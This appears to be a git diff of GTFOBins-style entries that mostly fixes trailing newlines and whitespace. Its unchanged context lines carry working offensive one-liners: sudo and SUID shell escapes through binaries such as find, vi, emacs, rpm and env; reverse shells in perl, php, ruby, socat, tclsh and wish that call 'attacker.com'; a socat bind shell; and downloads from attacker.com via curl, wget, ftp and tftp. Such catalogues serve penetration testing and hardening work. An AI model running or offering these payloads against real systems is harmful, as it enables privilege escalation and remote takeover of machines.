diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md index 0e3937b..cfff65a 100644 --- a/_gtfobins/ash.md +++ b/_gtfobins/ash.md @@ -6,4 +6,4 @@ functions: - code: sudo ash suid-enabled: - code: ./ash ---- \ No newline at end of file +--- diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md index d4ea657..e5890be 100644 --- a/_gtfobins/csh.md +++ b/_gtfobins/csh.md @@ -6,4 +6,4 @@ functions: - code: sudo csh suid-enabled: - code: ./csh -b ---- \ No newline at end of file +--- diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 70f52f8..8a1ce0d 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -12,4 +12,4 @@ functions: URL=http://attacker.com/file_to_get LFILE=where_to_save curl $URL -o $LFILE ---- \ No newline at end of file +--- diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md index 5f7a9db..2655229 100644 --- a/_gtfobins/emacs.md +++ b/_gtfobins/emacs.md @@ -6,4 +6,4 @@ functions: - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' suid-enabled: - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' ---- \ No newline at end of file +--- diff --git a/_gtfobins/env.md b/_gtfobins/env.md index b47eac4..b3e014f 100644 --- a/_gtfobins/env.md +++ b/_gtfobins/env.md @@ -6,4 +6,4 @@ functions: - code: sudo env /bin/sh suid-enabled: - code: ./env /bin/sh -p ---- \ No newline at end of file +--- diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md index f489f86..9cd0f3d 100644 --- a/_gtfobins/expect.md +++ b/_gtfobins/expect.md @@ -6,4 +6,4 @@ functions: - code: sudo expect -c 'spawn /bin/sh;interact' suid-enabled: - code: ./expect -c 'spawn /bin/sh -p;interact' ---- \ No newline at end of file +--- diff --git a/_gtfobins/find.md b/_gtfobins/find.md index be88dbf..433fadb 100644 --- a/_gtfobins/find.md +++ b/_gtfobins/find.md @@ -6,4 +6,4 @@ functions: - code: sudo find . -exec /bin/sh \; -quit suid-enabled: - code: ./find . -exec /bin/sh -p \; -quit ---- \ No newline at end of file +--- diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md index 6ef6c88..35e642e 100644 --- a/_gtfobins/ftp.md +++ b/_gtfobins/ftp.md @@ -20,4 +20,4 @@ functions: RHOST=attacker.com ftp $RHOST get file_to_get ---- \ No newline at end of file +--- diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md index a5f578e..bb95116 100644 --- a/_gtfobins/ionice.md +++ b/_gtfobins/ionice.md @@ -6,4 +6,4 @@ functions: - code: sudo ionice /bin/sh suid-enabled: - code: ./ionice /bin/sh -p ---- \ No newline at end of file +--- diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index cfcaa36..d26420b 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -12,4 +12,4 @@ functions: export RHOST=attacker.com export RPORT=12345 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ---- \ No newline at end of file +--- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 9699e68..7944ba5 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -35,6 +35,6 @@ functions: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com - export RPORT=12345 + export RPORT=12345 php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");' ---- \ No newline at end of file +--- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index c4cb4ab..d52e84c 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -6,4 +6,4 @@ functions: - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' ---- \ No newline at end of file +--- diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md index de73d72..5654fc5 100644 --- a/_gtfobins/rpmquery.md +++ b/_gtfobins/rpmquery.md @@ -6,4 +6,4 @@ functions: - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' ---- \ No newline at end of file +--- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index ff7cb48..66b3cea 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -17,4 +17,4 @@ functions: ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' load-library: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' ---- \ No newline at end of file +--- diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 437e83d..5418a54 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -4,11 +4,11 @@ functions: - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. code: | RHOST=attacker.com - RPORT=12345 + RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane bind-shell: - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane ---- \ No newline at end of file +--- diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md index 7479a82..1a23aa0 100644 --- a/_gtfobins/strace.md +++ b/_gtfobins/strace.md @@ -6,4 +6,4 @@ functions: - code: sudo strace -o /dev/null /bin/sh suid-enabled: - code: ./strace -o /dev/null /bin/sh -p ---- \ No newline at end of file +--- diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md index 813d4a2..9042146 100644 --- a/_gtfobins/taskset.md +++ b/_gtfobins/taskset.md @@ -6,4 +6,4 @@ functions: - code: sudo taskset 1 /bin/sh suid-enabled: - code: ./taskset 1 /bin/sh -p ---- \ No newline at end of file +--- diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index 6505349..c7ae1f4 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md @@ -14,8 +14,8 @@ functions: exec /bin/sh -p <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | + code: | export RHOST=attacker.com - export RPORT=12345 + export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh ---- \ No newline at end of file +--- diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index 8941650..f45e28a 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -32,5 +32,5 @@ functions: ./telnet $RHOST $RPORT ^] !/bin/sh - + --- diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md index a57adab..f391860 100644 --- a/_gtfobins/tftp.md +++ b/_gtfobins/tftp.md @@ -12,4 +12,4 @@ functions: RHOST=attacker.com tftp $RHOST get file_to_get ---- \ No newline at end of file +--- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index 5baf153..1c67ae5 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -10,4 +10,4 @@ functions: - code: sudo vi -c ':!/bin/sh' suid-enabled: - code: ./vi -c ':!/bin/sh -p' ---- \ No newline at end of file +--- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index 900f98a..f8dffb8 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -12,4 +12,4 @@ functions: export URL=http://attacker.com/file_to_get export LFILE=where_to_save wget $URL -O $LFILE ---- \ No newline at end of file +--- diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md index 12aedc0..230c0e9 100644 --- a/_gtfobins/wish.md +++ b/_gtfobins/wish.md @@ -10,8 +10,8 @@ functions: exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | + code: | export RHOST=attacker.com - export RPORT=12345 + export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish ---- \ No newline at end of file +--- diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md index acd3330..15cc1b3 100644 --- a/_gtfobins/zsh.md +++ b/_gtfobins/zsh.md @@ -6,4 +6,4 @@ functions: - code: sudo zsh suid-enabled: - code: ./zsh ---- \ No newline at end of file +---